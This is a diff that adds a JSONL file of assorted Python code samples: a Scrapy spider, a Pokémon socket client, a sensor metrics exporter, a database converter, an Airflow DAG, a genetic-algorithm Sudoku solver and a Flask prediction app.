diff --git "a/520.jsonl" "b/520.jsonl" new file mode 100644--- /dev/null +++ "b/520.jsonl" @@ -0,0 +1,743 @@ +{"seq_id":"583476916","text":"from scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.selector import Selector\n\nfrom ScrapyParser.items import SpidersItem, WisellItemLoader\n\nimport requests\n\n\nclass WisellSpider(CrawlSpider):\n name = 'wisell'\n\n start_urls = ['https://wisell.ru/catalog/platya/', 'https://wisell.ru/catalog/tuniki_bluzy/']\n allowed_domains = ['wisell.ru']\n\n rules = [Rule(LinkExtractor(restrict_xpaths=['//*[@id=\"catalog-lements-id\"]//li'],\n allow='/catalog/([A-Za-z0-9-_]+)/([A-Za-z0-9-]+)'),\n callback='parse_item'),\n Rule(LinkExtractor(restrict_xpaths=['//*[@id=\"main-catalog\"]/footer[1]/div/ul/li[6]']), follow=True)]\n\n def parse_item(self, response):\n selector = Selector(response)\n loader = WisellItemLoader(SpidersItem(), selector)\n loader.add_value('url', response.url)\n loader.add_xpath('price', '//*[@id=\"currency_tab-1\"]/div/div[2]/span/span/text()')\n loader.add_value('is_new', True if selector.xpath('//*[@id=\"item1\"]/div/span[2]/span/span').extract() else False)\n loader.add_value('site', 'wisell')\n small_url = selector.xpath('//*[@id=\"size-interval-tabs\"]/li/@data-url').extract()\n is_big = True if selector.xpath('//*[@id=\"size-interval-tabs\"]'\n '/li/a/@href').extract()[0] == '#size_rang-2' else False\n loader.add_value('_type', selector.xpath('//h1/text()').extract()[0].split(' ')[0])\n if small_url[0] and len(small_url) > 1:\n big_name = selector.xpath('//h1/text()').extract()[0].split(' ')[1]\n sizes_list = selector.xpath('//*[@id=\"size_rang-1\"]/div/ul/li/label//span/text()').extract()\n sizes_list.remove(sizes_list[0])\n small_size_link = 'https://wisell.ru%s' % (small_url[0])\n r = requests.get(small_size_link)\n selector = Selector(r)\n small_name = selector.xpath('//h1/text()').extract()[0].split(' ')[1]\n loader.add_value('name', '%s %s' % (big_name, small_name))\n small_sizes = selector.xpath('//*[@id=\"size_rang-1\"]/div/ul/li/label//span/text()').extract()\n small_sizes.remove(small_sizes[0])\n for size in small_sizes:\n if int(size) > 46 and size not in sizes_list:\n sizes_list.append(size)\n sizes_list.sort()\n loader.add_value('sizes', sizes_list)\n return loader.load_item()\n elif len(small_url) == 1 and is_big:\n loader.add_value('name', selector.xpath('//h1/text()').extract()[0].split(' ')[1])\n sizes_list = selector.xpath('//*[@id=\"size_rang-1\"]/div/ul/li/label//span/text()').extract()\n sizes_list.remove(sizes_list[0])\n loader.add_value('sizes', sizes_list)\n return loader.load_item()","sub_path":"ScrapyParser/spiders/wisell_spider.py","file_name":"wisell_spider.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632153650","text":"#!/usr/bin/env python3\n\nimport sys\nimport socket\nfrom struct import *\nfrom PIL import Image\nimport io\n\ndef es_entero(s):\n '''\n Funcion de verificacion que nos dice si s es un\n entero al hacer el cast\n :param s: str\n String que queremos verificar\n :return: True si en efecto se trata de un entero, False en otro caso\n '''\n try:\n int(s)\n return True\n except ValueError:\n return False\n\ndef envia_mensaje(sock, mensaje):\n '''\n Funcion que se encarga de enviar el mensaje a traves del socket\n :param sock: Socket a traves del cual mandaremos el mensaje\n :param mensaje: Mensaje que queremos mandar ya codificado\n :return: void\n '''\n MSGLEN = 1024\n totalsent = 0\n while totalsent < MSGLEN:\n sent = sock.send(mensaje[totalsent:])\n if sent == 0:\n raise RuntimeError(\"socket connection broken\")\n totalsent = totalsent + sent\n break\n\ndef recibe_mensaje(sock,MSGLEN = 1024):\n '''\n Funcion que se encarga de la recepcion de mensajes\n :param sock: socket que recibira el mensaje\n :param MSGLEN: Tama;o del buffer sobre el que leeremps\n :return: El mensaje obtenido del socket\n '''\n return sock.recv(MSGLEN)\n\n\ndef termina_sesion(sock):\n '''\n Funcion que se encarga de enviar un mensaje de fin de sesion al\n servidor y posteriormente terminar con la ejecucion del programa\n :param sock: Socket que enviara el mensaje y que terminara su sesion\n :return: void\n '''\n print(\"Terminando sesion\")\n envia_mensaje(sock, pack('b', 32)) # Enviamos mensaje de termino de sesion\n sock.close()\n exit()\n\ndef lee_imagen(mensaje):\n '''\n Funcion que se encarga de decodificar una imagen\n recibida en un mensaje codificado y posteriormente desplegar\n la imagen\n :param mensaje: Mensaje a decodificar\n :return: void\n '''\n (i,), mensaje = unpack(\"I\", mensaje[:4]), mensaje[4:]\n (i,), imagen = unpack(\"I\", mensaje[:4]), mensaje[4:]\n image = Image.open(io.BytesIO(imagen))\n image.show()\n\n\nif len(sys.argv) < 4:\n print(\"usage:\", sys.argv[0], \" <'pokedex'> \\n El ultimo argumento es por si se desea consultar la pokedex actual del usuario\")\n sys.exit(1)\nif not es_entero(sys.argv[3]):\n print(\"El id debe ser un entero\")\n sys.exit(1)\nif not es_entero(sys.argv[2]):\n print(\"El puerto debe ser un entero\")\n sys.exit(1)\nhost, port, id_usuario = sys.argv[1:4]\nid_usuario = int(id_usuario)\n\n\n\nserver_addr = (host, int(port))\nprint(\"Inicializando la conexion en \", server_addr)\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect_ex(server_addr)\nif len(sys.argv) == 5:\n if sys.argv[4].lower()== \"pokedex\":\n #Queremos la pokedex\n envia_mensaje(sock, pack('bb', 43, id_usuario)) #Codigo que pide la pokedex\n mensaje = recibe_mensaje(sock)\n if mensaje[0] == 44:\n longitud_string = mensaje[1]\n pokedex = unpack('%ds'%longitud_string ,mensaje[2:])[0].decode(\"utf-8\")\n print(\"Tu pokedex es la siguiente: \")\n print(pokedex)\n exit()\n\ntry:\n #Comenzamos con el mensaje inicial con el codigo 10 y el id\n msg = pack('bb',10,id_usuario)\n envia_mensaje(sock,msg)\n chunk = recibe_mensaje(sock)\n codigo = chunk[0]\n #En este punto el codigo puede ser 11 o 20\n if codigo == 41:\n print(\"El ID ingresado es invalido, intente con otro please\")\n termina_sesion(sock)\n if not codigo == 20:\n print(\"Ha ocurrido un error! Intenta de nuevo por favor :(\")\n termina_sesion(sock)\n #Nos regreso un string con pokemon con el codigo 20\n longitud_string = chunk[1]\n #Decodificamos el mensaje que recibimos donde esta el nombre del pokemon\n # y pasamos los bytes decodificados a un string para imprimir el mensaje al cliente\n nombre_pokemon = unpack('%ds'%longitud_string ,chunk[2:])[0].decode(\"utf-8\")\n print(\"Gusta capturar al pokemon %s?\"%nombre_pokemon)\n text = input(\"[si/No]\")\n if text != \"si\":\n termina_sesion(sock)\n\n puedo_intentar = True\n envia_mensaje(sock, pack('b', 30)) # Enviamos que si queremos intentar capturarlo\n mensaje = recibe_mensaje(sock,100000) #Aumentamos el tama;o del buffer porque puede haber una imagen\n while puedo_intentar:\n if mensaje[0] == 21:\n #No lo atrapamos por lo que imprimimos los intentos restantes\n intentos_restantes = mensaje[1]\n print(\"¿Intentar captura de nuevo? Quedan %d intentos.\"%intentos_restantes)\n text = input(\"[si/No]\")\n if text != \"si\":\n termina_sesion(sock)\n envia_mensaje(sock, pack('b', 30)) #Enviamos que queremos intentar nuevamente\n elif mensaje[0] == 22:\n print(\"Felicidades, has atrapado a %s\"%nombre_pokemon)\n lee_imagen(mensaje)\n puedo_intentar = False\n termina_sesion(sock)\n elif mensaje[0] == 23:\n print(\"Se han terminado tus intentos :/\")\n termina_sesion(sock)\n elif mensaje[0] == 42:\n print(\"Ha ocurrido un error u.u intenta de nuevo\")\n termina_sesion(sock)\n else:\n puedo_intentar = False\n print(\"Ha ocurrido un error, intenta de nuevo por favor\")\n termina_sesion(sock)\n mensaje = recibe_mensaje(sock, 100000)\n\n\nexcept KeyboardInterrupt:\n print(\"Interrupcion de teclado \\n Abortando...\\n Abortando..\\n Abortado X.X\")\nfinally:\n sock.close()","sub_path":"src/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378631841","text":"# This script detects for the presence of either a BME680 sensor on the I2C bus or a Sense HAT\n# The BME680 includes sensors for temperature, humidity, pressure and gas content\n# The Sense HAT does not have a gas sensor, and so air quality is approximated using temperature and humidity only.\n\nimport sys\nimport time\nimport smbus\nimport os\nimport _thread\nimport time\n\nfrom bme680 import BME680\nfrom prometheus_client import Gauge, start_http_server\nfrom w1therm import W1THERM\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nclass balenaSense():\n readfrom = 'unset'\n bus = smbus.SMBus(1)\n\n def __init__(self):\n # First, check to see if there is a BME680 on the I2C bus\n try:\n self.bus.write_byte(0x76, 0)\n except IOError:\n print('BME680 not found on 0x76, trying 0x77')\n else:\n self.readfrom = 'bme680primary'\n\n # If we didn't find it on 0x76, look on 0x77\n if self.readfrom == 'unset':\n try:\n self.bus.write_byte(0x77, 0)\n except IOError:\n print('BME680 not found on 0x77')\n else:\n self.readfrom = 'bme680secondary'\n\n\n # If no BME680, is there a Sense HAT?\n if self.readfrom == 'unset':\n try:\n self.bus.write_byte(0x5F, 0)\n except:\n print('Sense HAT not found')\n else:\n self.readfrom = 'sense-hat'\n print('Using Sense HAT for readings (no gas measurements)')\n\n # Import the sense hat methods\n import sense_hat_air_quality\n from hts221 import HTS221\n self.sense_hat_reading = lambda: sense_hat_air_quality.get_readings(HTS221())\n else:\n print('Using BME680 for readings')\n\n # Import the BME680 methods\n self.sensor = BME680(self.readfrom)\n\n\n # Next, check if there is a 1-wire temperature sensor (e.g. DS18B20)\n if self.readfrom == 'unset':\n if os.environ.get('BALENASENSE_1WIRE_SENSOR_ID') != None:\n sensor_id = os.environ['BALENASENSE_1WIRE_SENSOR_ID']\n else:\n sensor_id = None\n\n try:\n self.sensor = W1THERM(sensor_id)\n except:\n print('1-wire sensor not found')\n else:\n self.readfrom = '1-wire'\n print('Using 1-wire for readings (temperature only)')\n\n # If this is still unset, no sensors were found; quit!\n if self.readfrom == 'unset':\n print('No suitable sensors found! Exiting.')\n sys.exit()\n\n def sample(self):\n if self.readfrom == 'sense-hat':\n return self.apply_offsets(self.sense_hat_reading())\n else:\n return self.apply_offsets(self.sensor.get_readings(self.sensor))\n\n\n def apply_offsets(self, measurements):\n # Apply any offsets to the measurements before storing them in the database\n if os.environ.get('BALENASENSE_TEMP_OFFSET') != None:\n measurements[0]['fields']['temperature'] = measurements[0]['fields']['temperature'] + float(os.environ['BALENASENSE_TEMP_OFFSET'])\n\n if os.environ.get('BALENASENSE_HUM_OFFSET') != None:\n measurements[0]['fields']['humidity'] = measurements[0]['fields']['humidity'] + float(os.environ['BALENASENSE_HUM_OFFSET'])\n\n if os.environ.get('BALENASENSE_ALTITUDE') != None:\n # if there's an altitude set (in meters), then apply a barometric pressure offset\n altitude = float(os.environ['BALENASENSE_ALTITUDE'])\n measurements[0]['fields']['pressure'] = measurements[0]['fields']['pressure'] * (1-((0.0065 * altitude) / (measurements[0]['fields']['temperature'] + (0.0065 * altitude) + 273.15))) ** -5.257\n\n return measurements\n\n# \"eco2_ppm\", \"air_quality_score_accuracy\", \"bvoce_ppm\", \"temperature\", \"pressure\", \"air_quality_score\", \"humidity\"\n\n# Start the server to answer requests for readings\nbalenasense = balenaSense()\n\n# \"eco2_ppm\", \"air_quality_score_accuracy\", \"bvoce_ppm\", \"temperature\", \"pressure\", \"air_quality_score\", \"humidity\"\ngauge = Gauge('bme680_metrics', 'bme680_metrics', ['type'])\n\ndef fill_gauge():\n print('starting fill gauge thread')\n while True:\n time.sleep(5)\n try:\n measurements = balenasense.sample()\n except Exception as e:\n print('COULD NOT GET MEASUREMENTS', e)\n continue\n\n for k, v in measurements[0]['fields'].items():\n gauge.labels(type=k).set(v)\n\n_thread.start_new_thread(fill_gauge, ())\n\nprint('starting server at port 4242')\nstart_http_server(4242)\n","sub_path":"sensor/scripts/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"402534504","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.schema import MetaData\nfrom ouroboros.utils.meta import id, rename_table, exclude_columns, rename_columns\n\nconverters = {\n 'auth_group': [id()],\n 'blogs_category': [id()],\n 'commons_material': [id()],\n 'django_flatpage': [id()],\n 'django_flatpage_sites': [id()],\n 'django_site': [id()],\n 'profiles_skill': [id()],\n 'projects_category': [id()],\n 'tagging_tag': [id()],\n 'blogs_entry': [id()],\n\n 'auth_user': [rename_table('personas_persona')],\n\n 'events_event_members': [rename_table('events_event_attendees'),\n rename_columns({'user_id': 'persona_id'})],\n\n 'announcements_announcement': [exclude_columns(['upsated_by_id',\n 'publish_at',\n 'publish_at_date']),\n rename_columns({'sage': 'silently'})],\n 'events_event': [exclude_columns(['publish_at', 'publish_at_date'])],\n\n 'projects_project': [exclude_columns(['updated_by_id',\n 'publish_at',\n 'publish_at_date',\n 'bugwaz_id',\n 'permission']),\n rename_columns({'author_id': 'administrator_id'})],\n\n 'projects_project_members': [rename_columns({'user_id': 'persona_id'})],\n\n 'profiles_profile_skills': [rename_columns({'user_id': 'persona_id'})],\n\n 'star_star': [rename_table('stars_star'),\n rename_columns({'comment': 'quotes'}),\n exclude_columns(['tag'])]\n}\n\ndef pipe_functions(dic, key):\n def piped(x):\n r = x\n for d in dic:\n r = d[key](r)\n return r\n\n return piped\n\n\nif __name__ == '__main__':\n\n src_engine = create_engine('sqlite:///db/kawaz.db')\n dst_engine = create_engine('sqlite:///db/kawaz3.db', echo=True)\n\n src_meta = MetaData(bind=src_engine)\n src_meta.reflect()\n dst_meta = MetaData(bind=dst_engine)\n\n src_session = sessionmaker(bind=src_engine)()\n dst_session = sessionmaker(bind=dst_engine)()\n\n for src_tn in src_meta.tables:\n src_table = src_meta.tables[src_tn]\n if src_tn in converters:\n schema_convert = pipe_functions(converters[src_tn], 'table')\n dst_table = schema_convert(src_table).tometadata(dst_meta)\n dst_table.create()\n dst_session.commit()\n for r in src_session.query(src_table).all():\n src_record = r._asdict()\n record_convert = pipe_functions(converters[src_tn], 'record')\n dst_record = record_convert(src_record)\n ins = dst_table.insert(values=dst_record)\n dst_session.execute(ins)\n dst_session.commit()\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"467931667","text":"def solve(MEMBERS, FANS):\n res = 0\n for i in range(len(FANS) - len(MEMBERS) + 1):\n for j in range(len(MEMBERS)):\n if MEMBERS[j] == 'M' and FANS[j + i] == 'M':\n break\n else:\n res += 1\n return res\n\n\nif __name__ == \"__main__\":\n C = int(input())\n for _ in range(C):\n MEMBERS = input()\n FANS = input()\n print(solve(MEMBERS, FANS))\n","sub_path":"algospot.com/FANMEETING/solve_BruteForceTLE.py","file_name":"solve_BruteForceTLE.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"314760980","text":"import random\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nfrom deap import creator, base, tools, algorithms\nimport time\n\nstart_time = time.clock()\n''''\nfixedValues = np.array([\n\t\t\t\t\t\t#(val, row, col)\n\t\t\t\t\t\t(7, 0, 3),\n\t\t\t\t\t\t(1, 1, 0),\n\t\t\t\t\t\t(4, 2, 3),\n\t\t\t\t\t\t(3, 2, 4),\n\t\t\t\t\t\t(2, 2, 6),\n\t\t\t\t\t\t(6, 3, 8),\n\t\t\t\t\t\t(5, 4, 3),\n\t\t\t\t\t\t(9, 4, 5),\n\t\t\t\t\t\t(4, 5, 6),\n\t\t\t\t\t\t(1, 5, 7),\n\t\t\t\t\t\t(8, 5, 8),\n\t\t\t\t\t\t(8, 6, 4),\n\t\t\t\t\t\t(1, 6, 5),\n\t\t\t\t\t\t(2, 7, 2),\n\t\t\t\t\t\t(5, 7, 7),\n\t\t\t\t\t\t(4, 8, 1),\n\t\t\t\t\t\t(3, 8, 6)\n\t\t\t\t\t\t])\n\n'''\nfixedValues = np.array([\n\t\t\t\t\t\t#(val, row, col)\n\t\t\t\t\t\t(9, 0, 5),\n\t\t\t\t\t\t(5, 0, 8),\n\t\t\t\t\t\t(9, 1, 2),\n\t\t\t\t\t\t(1, 1, 3),\n\t\t\t\t\t\t(7, 1, 8),\n\t\t\t\t\t\t(8, 2, 0),\n\t\t\t\t\t\t(3, 2, 5),\n\t\t\t\t\t\t(4, 2, 8),\n\t\t\t\t\t\t(9, 3, 0),\n\t\t\t\t\t\t(6, 3, 1),\n\t\t\t\t\t\t(1, 3, 5),\n\t\t\t\t\t\t(8, 3, 6),\n\t\t\t\t\t\t(2, 5, 2),\n\t\t\t\t\t\t(6, 5, 3),\n\t\t\t\t\t\t(5, 5, 7),\n\t\t\t\t\t\t(1, 5, 8),\n\t\t\t\t\t\t(3, 6, 0),\n\t\t\t\t\t\t(9, 6, 3),\n (2, 6, 8),\n (1, 7, 0),\n (2, 7, 5),\n (3, 7, 6),\n (7, 8, 0),\n (4, 8, 3)\n ])\n'''\nfixedValues = np.array([\n\t\t\t\t\t\t#(val, row, col)\n\t\t\t\t\t\t(4, 0, 0),\n\t\t\t\t\t\t(5, 0, 5),\n\t\t\t\t\t\t(9, 1, 1),\n\t\t\t\t\t\t(6, 1, 4),\n\t\t\t\t\t\t(6, 2, 0),\n\t\t\t\t\t\t(2, 2, 4),\n\t\t\t\t\t\t(4, 2, 6),\n (8, 2, 7),\n\t\t\t\t\t\t(8, 3, 1),\n\t\t\t\t\t\t(7, 3, 5),\n\t\t\t\t\t\t(6, 3, 7),\n\t\t\t\t\t\t(4, 3, 8),\n (5, 4, 1),\n (9, 4, 2),\n (8, 4, 6),\n (3, 4, 7),\n\t\t\t\t\t\t(7, 5, 0),\n\t\t\t\t\t\t(6, 5, 1),\n\t\t\t\t\t\t(9, 5, 3),\n\t\t\t\t\t\t(5, 5, 7),\n\t\t\t\t\t\t(7, 6, 1),\n\t\t\t\t\t\t(5, 6, 2),\n (4, 6, 4),\n (8, 6, 8),\n (7, 7, 4),\n (4, 7, 7),\n (1, 8, 3),\n (2, 8, 8),\n ])\n'''\ndef printBoard(board):\n\tfor i in range(len(board)):\n\t\tif(i % 3 == 0 and i != 0):\n\t\t\tprint(\"------+------+------\")\n\t\tfor j in range(len(board[i])):\n\t\t\tif(j % 3 == 0 and j != 0):\n\t\t\t\tsys.stdout.write(\"|\")\n\t\t\tsys.stdout.write(str(board[i][j]) + \" \")\n\t\tprint(\"\")\n\ndef printBoardFromDNA64(individual):\n\tboard = buildBoardFromDNA64(individual)\n\tprintBoard(board)\n\ndef setup():\n\tboard = (np.indices((9,9)) + 1)[1]\n\tfor i in range(len(board)):\n\t\tboard[i] = np.random.permutation(board[i])\n\n\tfor (val, row, col) in fixedValues:\n\t\t\tswapToPlace(board, val, row, col)\n\n\tmask = np.ones((9,9), dtype=bool)\n\tfor (val, row, col) in fixedValues:\n\t\t\tmask[row][col] = False\n\n\tDNA = board[mask]\n\treturn DNA.tolist()\n\ndef swapToPlace(board, val, line, col):\n\t\tvalIndex = np.where(board[line]==val)[0][0]\n\t\tswap(board[line], valIndex, col)\n\ndef swap(arr, pos1, pos2):\n\tarr[pos1], arr[pos2] = arr[pos2], arr[pos1]\n\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\ncreator.create(\"Individual\", list, fitness=creator.FitnessMax)\n\ntoolbox = base.Toolbox()\n\ntoolbox.register(\"pos_val\", setup)\ntoolbox.register(\"individual\", tools.initIterate, creator.Individual, toolbox.pos_val)\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n\ndef fitnessFromDNA64(individual):\n\tboard = buildBoardFromDNA64(individual)\n\treturn fitnessFromBoard(board),\n\ndef buildBoardFromDNA64(individual):\n\tflattenedIdx = list(map(lambda t: t[1]*9 + t[2], fixedValues))\n\tvalues = fixedValues.T[0]\n\tflatBoard = []\n\tfixedValuesCounter = 0\n\tfor i in range(81):\n\t\tif(i in flattenedIdx):\n\t\t\tflatBoard.append(values[fixedValuesCounter])\n\t\t\tfixedValuesCounter += 1\n\t\t\tcontinue\n\t\tflatBoard.append(individual[i - fixedValuesCounter])\n\treturn np.array(flatBoard).reshape(9,9)\n\n\ndef fitnessFromBoard(board):\n\tscore = 0\n\trows, cols = board.shape\n\tfor row in board:\n\t\tscore += len(np.unique(row))\n\tfor col in board.T:\n\t\tscore += len(np.unique(col))\n\tfor i in range(0, 3):\n\t for j in range(0, 3):\n\t sub = board[3*i:3*i+3, 3*j:3*j+3]\n\t score += len(np.unique(sub))\n\treturn score\n\ntoolbox.register(\"evaluate\", fitnessFromDNA64)\ntoolbox.register(\"mate\", tools.cxTwoPoint)\ntoolbox.register(\"mutate\", tools.mutUniformInt, low=1, up=9, indpb=0.05)\ntoolbox.register(\"select\", tools.selTournament, tournsize=3) \n\npopulation = toolbox.population(n=1000)\n\ngensMin = []\ngensMax = []\ngensAvg = []\ngensStd = []\n\nNGEN=500\nMUPCT = 0.15\nstagnated = 0\nstagnation_limit = 300\nprevMax = -1\nfor gen in range(NGEN):\n\tprint(\"---GEN %i ---\" % gen)\n\toffspring = algorithms.varAnd(population, toolbox, cxpb=0.8, mutpb=MUPCT)\n\tfits = toolbox.map(toolbox.evaluate, offspring)\n\tfor fit, ind in zip(fits, offspring):\n\t\tind.fitness.values = fit\n\t\n\t# Gather all the fitnesses in one list and print the stats\n\tfits = [ind.fitness.values[0] for ind in offspring]\n\n\tlength = len(population)\n\tmean = sum(fits) / length\n\tsum2 = sum(x*x for x in fits)\n\tstd = abs(sum2 / length - mean**2)**0.5\n\n\tcurrMax = max(fits)\n\n\tif(currMax == prevMax):\n\t\tstagnated+=1\n\telse:\n\t\tstagnated = 0\n\t\tprevMax = currMax\n\n\tgensMin.append(min(fits))\n\tgensMax.append(max(fits))\n\tgensAvg.append(mean)\n\tgensStd.append(std)\n\n\tprint(\" Max %s\" % int(max(fits)))\n\tpopulation = toolbox.select(offspring, k=len(population))\ntopk = tools.selBest(population, k=1)\nfor solution in topk:\n\tprint(\"Pontos: %i/243\" % int(fitnessFromDNA64(solution)[0]))\n\tprintBoardFromDNA64(solution)\n\tprint(\"\")\n\nplt.subplot(111)\nplt.plot(gensMax, label=\"Max\")\nplt.plot(gensAvg, label=\"Avg\")\nplt.plot(gensMin, label=\"Min\")\nplt.legend(bbox_to_anchor=(0.8, 0.0, 0.2, .102), loc=3, ncol=1, mode=\"expand\", borderaxespad=0.)\nplt.title('Genetic Algorithm (Population = 1000, Crossover = 80%, Mutation = 15%)')\nplt.ylabel('Fitness Value (Max 243)')\nplt.xlabel('Iterations')\nplt.show()\nplt.savefig('GA_hard.png')\n\nprint(time.clock() - start_time, \"seconds\")","sub_path":"genetic2.py","file_name":"genetic2.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"505909178","text":"import numpy as np\nimport pandas as pd\nfrom flask import Flask, request, jsonify, render_template\nimport pickle\nfrom sklearn.externals import joblib\n\n\nwith open('model.pkl', 'rb') as model_file:\n model = pickle.load(model_file)\n\ntrain_data = pd.read_csv(\"filtered.csv\")\n# print(train_data)\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/predict', methods=[\"POST\"])\ndef predict():\n \"\"\"\n For handling predictions\n \"\"\"\n int_features = [34, 5, 5037, 11, 2015, 1.444444, 5037, 19, 19, 5]\n int_features2 = [int(x) for x in request.form.values()]\n k_features = train_data[(train_data['item_id'] == int_features2[1]) & (train_data['shop_id'] == int_features2[0])]\n if len(k_features) == 0:\n return render_template('index.html', predict_text=f\"Item id: %s and shop id: %s does not exits in our record\" % (int_features2[1], int_features2[0]))\n \n # final_features = [np.array(int_features)]\n prediction = model.predict(k_features)\n return render_template('index.html', predict_text=prediction)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"315315022","text":"\"\"\"Main DAG file.\"\"\"\n\nfrom datetime import datetime, timedelta\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators import (StageToRedshiftOperator, LoadFactOperator,\n LoadDimensionOperator, DataQualityOperator)\nfrom helpers import SqlQueries\n\ndefault_args = {\n 'owner': 'jonathankamau',\n 'start_date': datetime(2019, 1, 12),\n 'depends_on_past': False,\n 'retries': 3,\n 'retry_delay': timedelta(minutes=5),\n 'email_on_retry': False\n\n}\n\ndag = DAG('udac_example_dag',\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval='0 * * * *',\n catchup=False\n )\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\n\nstage_events_to_redshift = StageToRedshiftOperator(\n task_id='Stage_events',\n dag=dag,\n provide_context=True,\n table='staging_events',\n drop_table=True,\n aws_connection_id='aws_credentials',\n redshift_connection_id='redshift',\n create_query=SqlQueries.create_staging_events_table,\n s3_bucket='udacity-dend',\n s3_key='log_data',\n copy_options=\"json 's3://udacity-dend/log_json_path.json'\"\n)\n\nstage_songs_to_redshift = StageToRedshiftOperator(\n task_id='Stage_songs',\n dag=dag,\n provide_context=True,\n table='staging_songs',\n drop_table=True,\n aws_connection_id='aws_credentials',\n redshift_connection_id='redshift',\n create_query=SqlQueries.create_staging_songs_table,\n s3_bucket='udacity-dend',\n s3_key='song_data',\n copy_options=\"json 'auto'\"\n)\n\nload_songplays_table = LoadFactOperator(\n task_id='Load_songplays_fact_table',\n dag=dag,\n conn_id='redshift',\n target_table='songplays',\n drop_table=True,\n create_query=SqlQueries.create_songplays_table,\n insert_query=SqlQueries.songplay_table_insert,\n append=False\n)\n\nload_user_dimension_table = LoadDimensionOperator(\n task_id='Load_user_dim_table',\n dag=dag,\n conn_id='redshift',\n target_table='users',\n drop_table=True,\n create_query=SqlQueries.create_users_table,\n insert_query=SqlQueries.user_table_insert,\n append=False\n)\n\nload_song_dimension_table = LoadDimensionOperator(\n task_id='Load_song_dim_table',\n dag=dag,\n conn_id='redshift',\n target_table='songs',\n drop_table=True,\n create_query=SqlQueries.create_songs_table,\n insert_query=SqlQueries.song_table_insert,\n append=False\n)\n\nload_artist_dimension_table = LoadDimensionOperator(\n task_id='Load_artist_dim_table',\n dag=dag,\n conn_id='redshift',\n target_table='artists',\n drop_table=True,\n create_query=SqlQueries.create_artist_table,\n insert_query=SqlQueries.artist_table_insert,\n append=False\n)\n\nload_time_dimension_table = LoadDimensionOperator(\n task_id='Load_time_dim_table',\n dag=dag,\n conn_id='redshift',\n target_table='time',\n drop_table=True,\n create_query=SqlQueries.create_time_table,\n insert_query=SqlQueries.time_table_insert,\n append=False\n)\n\nrun_quality_checks = DataQualityOperator(\n task_id='Run_data_quality_checks',\n dag=dag,\n conn_id='redshift',\n target_tables=[\"songplays\", \"users\", \"songs\", \"artists\", \"time\"],\n)\n\nend_operator = DummyOperator(task_id='End_execution', dag=dag)\n\nstart_operator.set_downstream(\n [stage_events_to_redshift, stage_songs_to_redshift])\nload_songplays_table.set_upstream(\n [stage_events_to_redshift, stage_songs_to_redshift])\nload_songplays_table.set_downstream(\n [load_song_dimension_table, load_user_dimension_table, \n load_artist_dimension_table, load_time_dimension_table])\nrun_quality_checks.set_upstream(\n [load_song_dimension_table, load_user_dimension_table,\n load_artist_dimension_table, load_time_dimension_table])\nend_operator.set_upstream(run_quality_checks)\n","sub_path":"dags/udac_example_dag.py","file_name":"udac_example_dag.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"605508276","text":"\"\"\"\nMeasure how much overlap there is between training, validation and test samples\n\"\"\"\n\nprint(__doc__)\n\nfrom six.moves import cPickle as pickle\nimport numpy as np\n\n# test_pickle = open(\"notMNIST_small\\\\A.pickle\", 'rb')\n# data = pickle.load(test_pickle)\n# test_pickle.close()\n\npickle_file = open('notMNIST.pickle', 'rb')\ndata = pickle.load(pickle_file)\npickle_file.close()\ntrain_data = data['train_dataset']\n# test_data = data['test_dataset']\nvalid_data = data['valid_dataset']\ndel data\ntrain_data = train_data.reshape(train_data.shape[0], train_data.shape[\n 1] * train_data.shape[2])\n# test_data = test_data.reshape(test_data.shape[0], test_data.shape[1]*test_data.shape[2])\nvalid_data = valid_data.reshape(valid_data.shape[0], valid_data.shape[\n 1] * valid_data.shape[2])\n\n\ndef matrix_cmp(matrix_1, matrix_2):\n if matrix_1.shape[1] != matrix_2.shape[1]:\n print('Input vectors must havs same size!')\n return -1\n count = 0\n for i in matrix_1:\n for j in matrix_2:\n dis = np.linalg.norm(i - j)\n if dis == 0:\n count = count + 1\n return count / matrix_1.shape[0]\n\n# print('overlap between training and test samples:%.2f.\\n'% matrix_cmp(train_data[:10000], test_data))\nprint('overlap between training and validation samples:%.2f.\\n' %\n matrix_cmp(train_data[:10000], valid_data))\n# print('overlap between test and validation samples:%.2f.\\n'% matrix_cmp(test_data, valid_data))\n","sub_path":"overlap_measure.py","file_name":"overlap_measure.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64502720","text":"# area of square\n\nclass Areas:\n \n def __init__(self, length, breadth):\n self.length = length\n self.breadth = breadth\n \n def square(self):\n print(self.length*self.length)\n \n def triangle(self):\n self.height = 10\n 